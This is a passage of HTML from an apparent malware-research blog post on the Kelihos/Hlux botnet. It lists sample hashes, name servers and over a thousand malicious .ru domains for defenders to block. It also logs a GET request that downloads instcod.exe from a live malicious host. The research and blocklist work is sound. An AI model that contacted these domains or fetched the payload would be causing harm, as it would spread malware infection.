B1ABD1279A28F22B86A15D6DAFBC28A5<br />
DEAF70F248599985FC32B083F16F251A<br />
<br />
2012-11<br />
766A50581F6E47FF94126C5DBBD9FB01<br />
<br />
2012-12<br />
01B43C0C8D620E8B88D846E4C9287CCD<br />
15B9C9632510FB4D387D4A02ABF830DD<br />
1B342E6682167571B55AB59F3DD38D1E<br />
1C04C6B4E0BBBC99CCEE489270C98622<br />
30EA180ECE416600DABC5ADA0F630D06<br />
36C90E73120A419B4B00E66177040F43<br />
3A76AA2439112479635D7172DB2440B1<br />
44B342383E286465D74A838EE0780DDA<br />
56AD23082E5E73AAEB95E5A915DF5444<br />
69170C0C9FB4EEC6A630C4C9182505F0<br />
6B873B6D21ECC9ADF7246D644B23FB84<br />
7E1B91800F2FE9974C7BB18A7097D933<br />
9010DD12A1419E0F0098FD10CA324E23<br />
A15F02836309B819DE10068ED49D5D87<br />
A56577564E52251C54B27D4CA62C266F<br />
A8ABECD7C571AAEE6C964514133585F3<br />
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94<br />
DE5FDBAD9274B21EA5391F48441D33D8<br />
EB17EB2F02FA871C005C569B3299FCBA<br />
F5A6FC81A4F5AE6DEBFAC463DD49E1C2<br />
<br />
2013-01<br />
0481B4B12C8C69B735CAC2A918B52790<br />
223F7E425BD28AE13A54B2D0017D1E81<br />
2F091B59382F6CA9E1233EE38B171B2E<br />
49B6D19F9307C3BBA460C936ADE26B70<br />
A13B21423C5AE7BA318D0D26E672AD22<br />
CCA50DCB8A30B325BF10CED5DAE4D51A<br />
E453463A428A71A5DB19FC18807E747B<br />
<br />
ÀÄÄÄ2013-02<br />
4B6DFE2A4B0EF515275AC84B378D5F6F<br />
<br />
Folder PATH listing<br />
Volume serial number is 40A1-15F9<br />
C:\USERS\ADMIN\DESKTOP\ALL<br />
³ log.txt<br />
³ <br />
1985-12<br />
84741D6DFFC996D35B8DC0A01111A5DE<br />
<br />
2009<br />
23585DCBA9DFD4719ECC20B2D662D983<br />
A78BE2345E524515E0DD1CCCA3C524F9<br />
<br />
2010-01<br />
03F3B93A9B3D70D9BB9AD829A5F2361D<br />
787F39D70D2BEC3139A6EA7690B88464<br />
<br />
2010-02<br />
5B947FEAA5BFA951C94B11BB9EEA9BC3<br />
<br />
2010-03<br />
288E85A4A7756268EBDED1F356531E03<br />
<br />
2010-04<br />
0530898731D7165DBABBF6BF252BA77E<br />
15B6DFADD045E8282C4927F8BDD69D3E<br />
<br />
2010-05<br />
B568CF0982C867CD499F953E43738511<br />
C465888536A6785883079043F38143BD<br />
CE391D2B2036365D8943257FE1CB967E<br />
<br />
2010-06<br />
036ADB0D4B856C2A5E16175BD089FF24<br />
28A417B0EA5BE796720463607F06CCC9<br />
<br />
2010-07<br />
51D3E04AF7E29A1E3A1748E03F0BD578<br />
70FD6A11E482D756BEF27546AA112206<br />
76B7BB0CC2E3623078BF9E9A9A343CE1<br />
<br />
2010-11<br />
3D0F09DA5C5DBDB2124AEB0953F355B7<br />
<br />
2010-12<br />
0FEAAA4ADC31728E54B006AB9A7E6AFA<br />
<br />
2011-01<br />
9424EB9DE0558193A6B4D9607C23CBD5<br />
DFE01E12671BBDD7EC0F8BEBA08EC440<br />
<br />
2011-02<br />
352A8AB0D5C7DB40F865B0E7E03B1D96<br />
BB5560123C62588988BC22C704CD9E03<br />
<br />
2011-04<br />
D4CBEABAE5B4D4BAF14F554C8E9A4E86<br />
<br />
2011-05<br />
1E08449CE5848B6ADFEE48B1582EAEEF<br />
B63F25D5B02FE00D9423A7CCC0C3CCE2<br />
C98F3F5709292D6D97AD96C1A8459A81<br />
<br />
2011-07<br />
B66475ED30943C0056C9402DCAECB8B9<br />
<br />
2011-08<br />
7F7E0C58BDF1E47059DD84FFB301F6B7<br />
DCE41A00FB703B6A6324CE4F4C4DB143<br />
F604C7E4EC3A12A83E0852A9D7FE75CA<br />
<br />
2011-09<br />
396B88D48CC04A8C37F4409F65EA8A97<br />
72C1BEC266B23AF5CB12AE2F669D8784<br />
77E2D2A1E508EA30D548293E2C36D64F<br />
9C075FB471DC66394090C8BFAA4739A4<br />
C06414E1994BF4EFA41911CA81099411<br />
DF1A932144BF2C6E50FD090FDC1F1408<br />
<br />
2011-10<br />
0C921935F0880B5C2161B3905F8A3069<br />
3D711B47C8FDE2C6A5E62D6AD0BA7BB5<br />
5ACA74320003576F79CF6EDD0629CC13<br />
<br />
2011-11<br />
2B4A5F1C8225D9043AE1302DCCD7063B<br />
3774D5BD50F4286531FEDF716D83FC6E<br />
5BA7D2DE0CCC58F104240610BF297E6E<br />
9CA42C5B352DEFB53F8D30C16B36697A<br />
<br />
2011-12<br />
E2F8F5C80566BF32E1841B3C5A669D42<br />
<br />
2012-01<br />
F96EBF8128BFC6965C73A2659718C663<br />
<br />
2012-02<br />
6F6B016A5DB1791188D7C98A464292CC<br />
<br />
2012-03<br />
093586512549F2D016AD4C70F4F8E5C8<br />
<br />
2012-04<br />
80E595253D3E02071D2564BA8296D308<br />
<br />
2012-06<br />
08862142D7313A1D431D67E0E755EFC7<br />
223D32E3F6BB9C5A6AD3CD58B898EFA1<br />
5BECB2498EA801ED010DD073007E20CE<br />
5FFE38CA9FE07394D1BC5C270E83B253<br />
A910A324394B56022C7AC10DB22EC3F6<br />
<br />
2012-07<br />
3B6A3354B71CD674D4BC27646D270502<br />
4C2DB57ED5D27F54120765A9FA9C3BC7<br />
<br />
2012-08<br />
2304FA9A6A67984CA0FF9E9BF561817A<br />
7316D0EE9C0B6C23C7CEB2D04DC6B665<br />
EB4DBB18D00321A809A6C4D8594DDF5A<br />
<br />
2012-10<br />
25B4C1C68C58D7D559E8682117D7C01F<br />
63C926F659C3EDEC0B85C91898622A4D<br />
6AA100C459E854A9A334B10468EAD014<br />
8005E44761B842370D43299B29B0F16A<br />
B1ABD1279A28F22B86A15D6DAFBC28A5<br />
DEAF70F248599985FC32B083F16F251A<br />
<br />
2012-11<br />
766A50581F6E47FF94126C5DBBD9FB01<br />
<br />
2012-12<br />
01B43C0C8D620E8B88D846E4C9287CCD<br />
15B9C9632510FB4D387D4A02ABF830DD<br />
1B342E6682167571B55AB59F3DD38D1E<br />
1C04C6B4E0BBBC99CCEE489270C98622<br />
30EA180ECE416600DABC5ADA0F630D06<br />
36C90E73120A419B4B00E66177040F43<br />
3A76AA2439112479635D7172DB2440B1<br />
44B342383E286465D74A838EE0780DDA<br />
56AD23082E5E73AAEB95E5A915DF5444<br />
69170C0C9FB4EEC6A630C4C9182505F0<br />
6B873B6D21ECC9ADF7246D644B23FB84<br />
7E1B91800F2FE9974C7BB18A7097D933<br />
9010DD12A1419E0F0098FD10CA324E23<br />
A15F02836309B819DE10068ED49D5D87<br />
A56577564E52251C54B27D4CA62C266F<br />
A8ABECD7C571AAEE6C964514133585F3<br />
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94<br />
DE5FDBAD9274B21EA5391F48441D33D8<br />
EB17EB2F02FA871C005C569B3299FCBA<br />
F5A6FC81A4F5AE6DEBFAC463DD49E1C2<br />
<br />
2013-01<br />
0481B4B12C8C69B735CAC2A918B52790<br />
223F7E425BD28AE13A54B2D0017D1E81<br />
2F091B59382F6CA9E1233EE38B171B2E<br />
49B6D19F9307C3BBA460C936ADE26B70<br />
A13B21423C5AE7BA318D0D26E672AD22<br />
CCA50DCB8A30B325BF10CED5DAE4D51A<br />
E453463A428A71A5DB19FC18807E747B<br />
<br />
2013-02<br />
4B6DFE2A4B0EF515275AC84B378D5F6F<br />
<br />
09-2020<br />
22AE2A6FF14C58265B5C79FBC25A91B6<br />
<span style="font-family: inherit; text-align: left;"> </span></div>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"> </span></span>
<br />
<div>
</div>
<span style="font-family: inherit;"> <span style="text-align: left;"><span style="line-height: 19px;">Some of the domains we saw from the binaries above: (see the full list of associated domains below)</span></span></span><br />
<span style="font-family: inherit;"><span style="text-align: left;"><span style="line-height: 19px;">
</span></span> <span style="line-height: 19px;">akpuxqaz.ru</span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">apnifosa.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">bugfivin.ru </span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">cagremub.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">diqnawug.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">dufyhive.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">jiwviqpa.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">merwiqca.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">wowrizep.ru</span></span>
<br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><br /></span></span>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><b>Traffic information</b></span></span></div>
<div>
<blockquote class="tr_bq">
GET /instcod.exe HTTP/1.0<br />
Host: wowrizep.ru</blockquote>
<blockquote class="tr_bq">
HTTP/1.1 200 Ok<br />
Server: Apache<br />
Content-Length: 785920<br />
Content-Type: application/octet-stream<br />
Last-Modified: .., 06 ... 2013 13:47:52 GMT<br />
Accept-Ranges:<br />
bytes<br />
MZ......................@...................................|...........!..L.!..This program must be run under Win32Domains associated with Kelihos distribution and CnC</blockquote>
<br />
<span style="font-family: inherit;">
</span> <span style="font-family: inherit;">The http request is still incomplete in this example (as described here <a href="http://www.abuse.ch/?p=3658">http://www.abuse.ch/?p=3658</a>)</span><br />
<blockquote class="tr_bq">
URL: http://wowrizep.ru/instcod.exe<br />
TYPE: GET<br />
UA: None<br />
URL: http://jiwviqpa.ru/instcod.exe<br />
TYPE: GET</blockquote>
<blockquote class="tr_bq">
<b>wowrizep.ru</b></blockquote>
<blockquote class="tr_bq">
<span style="font-family: inherit;">nserver: ns2.larstor.com. (other name servers listed below)</span><span style="font-family: inherit;">nserver: </span><span style="font-family: inherit;">ns3.larstor.com.</span><span style="font-family: inherit;">nserver: </span>
<span style="font-family: inherit;">ns4.larstor.com.</span><span style="font-family: inherit;">nserver: </span>
<span style="font-family: inherit;">ns5.larstor.com.</span> <span style="font-family: inherit;">nserver: </span>
<span style="font-family: inherit;">ns6.larstor.com.</span> <span style="font-family: inherit;">state: </span>
<span style="font-family: inherit;">REGISTERED, NOT DELEGATED, UNVERIFIED</span><br />
<span style="font-family: inherit;">person: Private Person</span><br />
<span style="font-family: inherit;">registrar: REGGI-REG-RIPN</span><br />
<span style="font-family: inherit;">admin-contact: https://panel.reggi.ru/user/whois/webmail/</span><br />
<span style="font-family: inherit;">created: 2012.12.22</span><br />
<span style="font-family: inherit;">paid-till: 2013.12.22</span>
<span style="font-family: inherit;">free-date: 2014.01.22</span></blockquote>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Over 6 hours one infected machine had communications with over 1550 peers (unique IPs). Traffic flow shown from our sandbox IP in San Francisco, CA</span><br />
<script type="text/javascript">
window.onload=function(){
var tfrow = document.getElementById('tfhover').rows.length;
var tbRow=[];
for (var i=1;i<tfrow;i++) {
tbRow[i]=document.getElementById('tfhover').rows[i];
tbRow[i].onmouseover = function(){
this.style.backgroundColor = '#4D938C';
};
tbRow[i].onmouseout = function() {
this.style.backgroundColor = '#4D938C';
};
}
};
</script>
<style type="text/css">
table.tftable {font-size:12px;color:#4D938C;width:100%;border-width: 1px;border-color: #4D938C;border-collapse: collapse;}
table.tftable th {font-size:12px;background-color:#4D938C;border-width: 1px;padding: 8px;border-style: solid;border-color: #4D938C;text-align:left;}
table.tftable tr {background-color:#4D938C;}
table.tftable td {font-size:12px;border-width: 1px;padding: 8px;border-style: solid;border-color: #4D938C;}
</style>
<br />
<table border="1" class="tftable" id="tfhover">
<tbody>
<tr><th><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqGEb_rnXe7EOl1K4n8EtXKgHCCS6fH_VjH0JAN7lcep3y2NUDX6GvuzUwn8__wW7Kyy2Jjb305sCsBbSEIm9Y0nW1YoSzHuQOJjyB7896fv_rI_oVlTbxIecjp895YTKD4hoFGYBhuE/s1600/usa.PNG" imageanchor="1" style="font-weight: normal; margin-left: 1em; margin-right: 1em; text-align: left;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqGEb_rnXe7EOl1K4n8EtXKgHCCS6fH_VjH0JAN7lcep3y2NUDX6GvuzUwn8__wW7Kyy2Jjb305sCsBbSEIm9Y0nW1YoSzHuQOJjyB7896fv_rI_oVlTbxIecjp895YTKD4hoFGYBhuE/s320/usa.PNG" width="320" /></a></div>
</th><th><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Y98vCnFYWGl1My77dHxcaT6hsEmd6n0QHNLnFEB6UwTkmL5vz0JPQl6rTNWjeL2h49QgYJ71sR4YjqM_Bc-v9cz2bSvwJp3sbqElUFb8cdk2-TgMoVMY3qLjEWZe7lR3k4RYCrkklOU/s1600/eu.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Y98vCnFYWGl1My77dHxcaT6hsEmd6n0QHNLnFEB6UwTkmL5vz0JPQl6rTNWjeL2h49QgYJ71sR4YjqM_Bc-v9cz2bSvwJp3sbqElUFb8cdk2-TgMoVMY3qLjEWZe7lR3k4RYCrkklOU/s320/eu.PNG" width="320" /></a></div>
<div style="text-align: left;">
</div>
</th></tr>
<tr><td><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEObgJNszXjpCv-380w_rMDh3uA3aOSn41PodyawJPzrBowNNIbGWyL-0Ws8eHN2BtzkpvbEOPNi8D_8R4QeHbbIkXVaT1gthCYKQuym_LeDRNYTvYOspI2dNndhegXw-bzTFDkn7CCE/s1600/map2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEObgJNszXjpCv-380w_rMDh3uA3aOSn41PodyawJPzrBowNNIbGWyL-0Ws8eHN2BtzkpvbEOPNi8D_8R4QeHbbIkXVaT1gthCYKQuym_LeDRNYTvYOspI2dNndhegXw-bzTFDkn7CCE/s320/map2.PNG" width="320" /></a></div>
</td><td><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs43MciPWDCSfuH5vqCXkfIP9ZSBaPP2Nkvw1MPcwflvyPq6CriywCb4aPoJ_SuEtd3gd9Hp8e36PI553aNxBprVNsoIRI06cskMUALe3WIUJhGoVOEXAVhJNbXtWZ2iIh80mHzx-xbW0/s1600/map1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs43MciPWDCSfuH5vqCXkfIP9ZSBaPP2Nkvw1MPcwflvyPq6CriywCb4aPoJ_SuEtd3gd9Hp8e36PI553aNxBprVNsoIRI06cskMUALe3WIUJhGoVOEXAVhJNbXtWZ2iIh80mHzx-xbW0/s320/map1.PNG" width="320" /></a></div>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<b><br /></b>
<br />
<div style="text-align: left;">
<b><span style="color: #e69138;">Known domains associated with Kelihos/Hlux distribution and command&control servers (Feb. 2013-2012)</span></b></div>
</div>
<div style="text-align: left;">
<br /></div>
<br />
Hundreds of domains pointing to these name servers are listed below as one list. If you see ".com" in the list, this is a name sever and is where the next batch of domains begins. You should see batches for these name servers (1500+) that are associated with Redkit, Blackhole and other exploit kits mostly delivering Kelihos/Hlux and sometimes Virut, that has been associated with this botnet as well (<a href="http://www.symantec.com/connect/fr/blogs/waledac-gets-cozy-virut">Jan. 2013 - Waledac Gets Cozy with Virut - Symantec</a>). Some domains were moved to new name servers as the old ones were suspended. (for example, many domains were moved from ns[1-6].systeat.com to ns[1-6].turbusy.com.<br />
<br />
Compare it to the usage of eu domains from the last year here <a href="http://www.abuse.ch/?p=3658.">http://www.abuse.ch/?p=3658.</a><br />
<br />
RU domains<br />
<br />
<ul>
<li>ns[1-6].boomsco.com - domains registered on 2013-01-13 << most active now</li>
<li>ns[1-6].larstor.com - domains registered on 2012-12-22 << most active now </li>
<li>ns[1-6].berchae.com (suspended) - domains registered on 2012-12-21</li>
<li>ns[1-6].zempakiv.ru - domains registered on 2012.12.07 << most active now </li>
<li>ns[1-6].newrect.com - domains registered on 2012-08-01 </li>
<li>ns[1-6].turbusy.com - domains registered on 2012-12-07 </li>
<li>ns[1-6].chokode.com (suspended) - domains registered on 2012-09-06 </li>
<li>ns[1-6].biocruc.com (suspended) - domains registered on 2012-07-15 </li>
<li>ns[1-6].systeat.com (suspended) - domains registered on 2012-07-07 </li>
<li>ns[1-6].affour.com (suspended) - domains registered on 2012-06-29</li>
<li>ns[1-6].reetsp.com (suspended) - domains registered on 2012-06-29</li>
<li>ns[1-6].oparle.com - domains registered on 2012-06-05 </li>
<li>ns[1-6].toastop.com (suspended) - domains registered on 2012-05-27</li>
<li>ns[1-6].ocorti.com (suspended) - domains registered on 2012-04-21</li>
<li>ns[1-6].esanty.com (suspended) - domains registered on 2012-04-09</li>
<li>ns[1-6].diastr.com (suspended) - domains registered on 2012-04-09</li>
<li>ns[1-6].snapoli.com (suspended) - domains registered on 2012-04-02</li>
<li>ns[1-6].maguiso.com (suspended) - domains registered on 2012-03-05</li>
<li>ns[1-6].swartra.com - domains registered on 2011-10-12</li>
</ul>
EU domains<br />
<ul>
<li>ns[1-6].frostli.com (suspended) - domains registered on 2012-04-21</li>
<li>ns[1-6].pizzebu.com (suspended) - domains registered on 2012-01-13</li>
</ul>
IN domains<br />
<ul>
<li>ns[1-6].firstara.com - domains registered on 2012-3-8</li>
</ul>
CE.MS domains (used before 2012)<br />
<ul>
<li>ns[1-6].roblect.com - domains registered on 2011-12-01</li>
<li>ns[1-6].galloma.com - domains registered on 2011-10-31</li>
</ul>
<b><span style="color: #e69138;">Domain list</span></b><br />
All known domains sorted by the name server and age (newest on top - see the name server registration dates on top) If you see any machines connecting to any of these domains, it is likely be infected. Listed by nameservers and NS create date. There is some duplicates in the list as same domain could move from one NS to another.<br />
<br />
Download:<br />
<a href="http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt">http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt</a> - txt file with 430+ domains using currently active name servers = > for active defense<br />
boomsco.com<br />
larstor.com<br />
zempakiv.ru<br />
newrect.com<br />
turbusy.com<br />
<br />
<a href="http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt">http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt</a> - txt file with all 1550+ known to us Kelihos domains including suspended and sinkholed (2013-2011). Sorted by age (newest-oldest) = for DNS monitoring and research.<br />
<br />
There are 1550+ unique domains.<br />
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
ns[1-6].boomsco.com<br />
aggeymin.ru<br />
amxylkap.ru<br />
aqqajofi.ru<br />
asyknika.ru<br />
bojsedyt.ru<br />
cevlyxaq.ru<br />
copapjid.ru<br />
cujemjev.ru<br />
dikojnah.ru<br />
dobikuwe.ru<br />
dubfoluc.ru<br />
dyrzaqfu.ru<br />
dyxketam.ru<br />
egygumlo.ru<br />
fachejyp.ru<br />
favickov.ru<br />
fycedqek.ru<br />
fytfotlo.ru<br />
giffunri.ru<br />
gishabet.ru<br />
guqyvzap.ru<br />
gybebeho.ru<br />
gyvolnac.ru<br />
icepijog.ru<br />
iszivkyc.ru<br />
jiyknuqi.ru<br />
linyaqor.ru<br />
lisybsij.ru<br />
lyfqekow.ru<br />
nebgisyk.ru<br />
ojvectyk.ru<br />
olsicwiq.ru<br />
owideker.ru<br />
pahfyhfi.ru<br />
papcybop.ru<br />
pecunvom.ru<br />
pegarpem.ru<br />
pipuwbap.ru<br />
pusycqyz.ru<br />
qatuhnaf.ru<br />
qiqwoxki.ru<br />
qysmahku.ru<br />
rulwusyc.ru<br />
sedfibyr.ru<br />
solhusny.ru<br />
sudiydyx.ru<br />
syrjikhe.ru<br />
tegeqfux.ru<br />
tepmahiq.ru<br />
tijenric.ru<br />
todqenym.ru<br />
tubtihiv.ru<br />
uvvycceh.ru<br />
vacrajak.ru<br />
viackipa.ru<br />
vubupbeb.ru<br />
vybakcov.ru<br />
vyfnozed.ru<br />
vygwomak.ru<br />
wevwubhy.ru<br />
woldanov.ru<br />
xifaknow.ru<br />
xitydjeg.ru<br />
xizzawvu.ru<br />
xyjiekfe.ru<br />
yjaqexha.ru<br />
ykmeffyw.ru<br />
ylgoaxle.ru<br />
yvxaghod.ru<br />
zakiixwe.ru<br />
zehyqjol.ru<br />
zyfwomep.ru<br />
zyqutfeb.ru<br />
zyrapfev.ru<br />
<br />
<br />
ns[1-6].larstor.com<br />
acdastas.ru<br />
afdotrin.ru<br />
akmaxook.ru<br />
akpuxqaz.ru<br />
anhofciv.ru<br />
apnifosa.ru<br />
awetefid.ru<br />
batycfac.ru<br />
bowbiluk.ru<br />
bugfivin.ru<br />
cagremub.ru<br />
cimhuspi.ru<br />
didcufun.ru<br />
diqnawug.ru<br />
diteqciq.ru<br />
dofihhog.ru<br />
dokelzel.ru<br />
dufyhive.ru<br />
ecrihgep.ru<br />
ejzazsax.ru<br />
ektizzab.ru<br />
eldacbet.ru<br />
epejanhi.ru<br />
ewenhugi.ru<br />
fedvojvy.ru<br />
fetolbus.ru<br />
gehxehib.ru<br />
goktypxi.ru<br />
guphumsa.ru<br />
hulirkox.ru<br />
ixehmona.ru<br />
jasfagal.ru<br />
jiwviqpa.ru<br />
jizevcyr.ru<br />
jizugqux.ru<br />
joljihuk.ru<br />
jonkisig.ru<br />
junedles.ru<br />
kevzimom.ru<br />
kicsodho.ru<br />
laqursoh.ru<br />
lejbomor.ru<br />
lilkepiv.ru<br />
liwuwquh.ru<br />
lofibvar.ru<br />
lymurufa.ru<br />
merwiqca.ru<br />
nopepkaq.ru<br />
nosgazim.ru<br />
nozwyhvi.ru<br />
nylzudwo.ru<br />
ocbiccan.ru<br />
odmurwal.ru<br />
ophirjih.ru<br />
otfasdac.ru<br />
pikkokih.ru<br />
pinvahub.ru<br />
pofhufso.ru<br />
pomywwaq.ru<br />
pypwalve.ru<br />
qyxoxuzo.ru<br />
rabpabyr.ru<br />
racapsyq.ru<br />
raguhloc.ru<br />
rujascur.ru<br />
soduvnec.ru<br />
sumjecyg.ru<br />
tuguijab.ru<br />
tyjkexax.ru<br />
ugnyspyr.ru<br />
uhpygxav.ru<br />
uqoquchy.ru<br />
vibewpav.ru<br />
vopiifdu.ru<br />
vortatar.ru<br />
vyzyxqyg.ru<br />
wowrizep.ru<br />
wufjajcy.ru<br />
xivobwyb.ru<br />
yficebnu.ru<br />
ynpucwif.ru<br />
ypvudhek.ru<br />
zazzeqan.ru<br />
zedwyzuc.ru<br />
zegkyfga.ru<br />
zunvexuq.ru<br />
<br />
ns2.oilined.com<br />
abofaxtu.ru<br />
afxeftof.ru<br />
ajgijuap.ru<br />
atkoskih.ru<br />
atxembef.ru<br />
avmakpyt.ru<br />
axcakqif.ru<br />
azvaebyn.ru<br />
bakuzbuq.ru<br />
bangurec.ru<br />
behbusqu.ru<br />
cesivpil.ru<br />
citpoloj.ru<br />
cucaklif.ru<br />
cundimam.ru<br />
dohjapju.ru<br />
enhawcus.ru<br />
etujaqhe.ru<br />
faplejir.ru<br />
fawsilom.ru<br />
fidqyzar.ru<br />
fiwbyjhu.ru<br />
focpidas.ru<br />
fyzsicat.ru<br />
gijcodox.ru<br />
girwysca.ru<br />
gywquroz.ru<br />
hevlehaw.ru<br />
hezyddij.ru<br />
hikutcur.ru<br />
ibjiocuw.ru<br />
ihdidcyd.ru<br />
ikbyznod.ru<br />
irtoexki.ru<br />
isbegisy.ru<br />
iwhuwugy.ru<br />
iwnemfam.ru<br />
ixfocgaf.ru<br />
jilvoqsi.ru<br />
jiragsug.ru<br />
jureetse.ru<br />
juuqbuah.ru<br />
kixqusos.ru<br />
kugfulyw.ru<br />
lafdamow.ru<br />
lecjefys.ru<br />
linsubby.ru<br />
liwmiccu.ru<br />
mywbywur.ru<br />
narzoquc.ru<br />
norfikuf.ru<br />
nowqubxi.ru<br />
nudsawyj.ru<br />
nuzejviz.ru<br />
nypmivhy.ru<br />
nyzvelew.ru<br />
ogedlayc.ru<br />
oqivynle.ru<br />
owtaprel.ru<br />
pegkowoz.ru<br />
powosjec.ru<br />
qamelzyc.ru<br />
qufexkig.ru<br />
qyqkedpy.ru<br />
qysriloh.ru<br />
rehvuwib.ru<br />
rosacomi.ru<br />
ryqpynar.ru<br />
secegbiw.ru<br />
sepsiqbo.ru<br />
sybqipfe.ru<br />
syxozwag.ru<br />
taosiram.ru<br />
tiglatep.ru<br />
toszegky.ru<br />
towmidar.ru<br />
tozlisdi.ru<br />
tunzovnu.ru<br />
tyryfpix.ru<br />
ucxegxox.ru<br />
urvohnux.ru<br />
vagavheh.ru<br />
vehyfgor.ru<br />
wascadux.ru<br />
waxpehby.ru<br />
worgukiw.ru<br />
xoztyhto.ru<br />
ydfivmim.ru<br />
yjjipdyl.ru<br />
yksigxes.ru<br />
ykyczeis.ru<br />
zempakiv.ru<br />
zifrazah.ru<br />
zitifhuz.ru<br />
zurgovod.ru<br />
zuzikkeg.ru<br />
<br />
ns[1-6].newrect.com<br />
avenqyz.ru<br />
axbuzyg.ru<br />
azkenyb.ru<br />
azkygaj.ru<br />
baefrih.ru<br />
bicjeko.ru<br />
buhfyta.ru<br />
bumwiyc.ru<br />
bypimih.ru<br />
byxkauv.ru<br />
ceguheq.ru<br />
copyseq.ru<br />
deqbyyq.ru<br />
ebtanij.ru<br />
ekabdyz.ru<br />
ekafken.ru<br />
emjokar.ru<br />
epsaboq.ru<br />
eqtiwuf.ru<br />
evleseh.ru<br />
evutdoz.ru<br />
ewtaniq.ru<br />
focegob.ru<br />
folkaax.ru<br />
fubojla.ru<br />
fuvijsa.ru<br />
fynydre.ru<br />
fyvavcu.ru<br />
goxizap.ru<br />
harwauz.ru<br />
haxuryg.ru<br />
himytyp.ru<br />
hucimaf.ru<br />
huwxiyl.ru<br />
iloblod.ru<br />
ilulxak.ru<br />
innefwo.ru<br />
irroxux.ru<br />
jakybus.ru<br />
jerjigo.ru<br />
jifecad.ru<br />
jokbuoj.ru<br />
jyluxel.ru<br />
kidazpa.ru<br />
kovawap.ru<br />
kykufep.ru<br />
latokoz.ru<br />
lirowyg.ru<br />
lofbiwa.ru<br />
lohucif.ru<br />
lujmyvo.ru<br />
majiqec.ru<br />
mochusi.ru<br />
neiscig.ru<br />
nixuxor.ru<br />
nodyfux.ru<br />
nonogci.ru<br />
nycaqsy.ru<br />
nyygtic.ru<br />
obymhij.ru<br />
odgazoz.ru<br />
ogazbyj.ru<br />
ogpexol.ru<br />
ohdujne.ru<br />
ollobun.ru<br />
onixdud.ru<br />
orxykud.ru<br />
otrasan.ru<br />
owpejip.ru<br />
pyjivga.ru<br />
qadazor.ru<br />
qadyqow.ru<br />
qaokdyj.ru<br />
qaromyz.ru<br />
qewkima.ru<br />
qovizki.ru<br />
rijygur.ru<br />
rovikvy.ru<br />
ruqyxed.ru<br />
ryygwoh.ru<br />
sejyfat.ru<br />
semgijo.ru<br />
tenuluc.ru<br />
tivizty.ru<br />
towilax.ru<br />
tuqjyze.ru<br />
ugcyneg.ru<br />
unwylhi.ru<br />
unxajen.ru<br />
urekkyf.ru<br />
uvehpan.ru<br />
vaqnula.ru<br />
vepyhga.ru<br />
viqsieb.ru<br />
voqukyh.ru<br />
wekveom.ru<br />
wenybwu.ru<br />
weozgyv.ru<br />
wokseja.ru<br />
wufkedy.ru<br />
wumyhma.ru<br />
wylyhan.ru<br />
xeatsif.ru<br />
xiguzow.ru<br />
xowkocy.ru<br />
xurywdo.ru<br />
xyqysaf.ru<br />
ydhomum.ru<br />
ydywzik.ru<br />
zegykso.ru<br />
zofabby.ru<br />
zuattiw.ru<br />
zyglooj.ru<br />
zytidel.ru<br />
abofaxtu.ru<br />
afxeftof.ru<br />
ahtiagge.ru<br />
ajgijuap.ru<br />
atkoskih.ru<br />
atxembef.ru<br />
avmakpyt.ru<br />
axcakqif.ru<br />
azvaebyn.ru<br />
bakuzbuq.ru<br />
bangurec.ru<br />
behbusqu.ru<br />
cesivpil.ru<br />
citpoloj.ru<br />
cucaklif.ru<br />
cundimam.ru<br />
dohjapju.ru<br />
enhawcus.ru<br />
etujaqhe.ru<br />
faplejir.ru<br />
fawsilom.ru<br />
fidqyzar.ru<br />
fiwbyjhu.ru<br />
focpidas.ru<br />
fyzsicat.ru<br />
gasosvaz.ru<br />
gegwikaf.ru<br />
gijcodox.ru<br />
girwysca.ru<br />
gywquroz.ru<br />
hevlehaw.ru<br />
hezyddij.ru<br />
hikutcur.ru<br />
ibjiocuw.ru<br />
ihdidcyd.ru<br />
ikbyznod.ru<br />
irtoexki.ru<br />
isbegisy.ru<br />
iwhuwugy.ru<br />
iwnemfam.ru<br />
ixfocgaf.ru<br />
jilvoqsi.ru<br />
jiragsug.ru<br />
jureetse.ru<br />
juuqbuah.ru<br />
kixqusos.ru<br />
kugfulyw.ru<br />
lafdamow.ru<br />
lecjefys.ru<br />
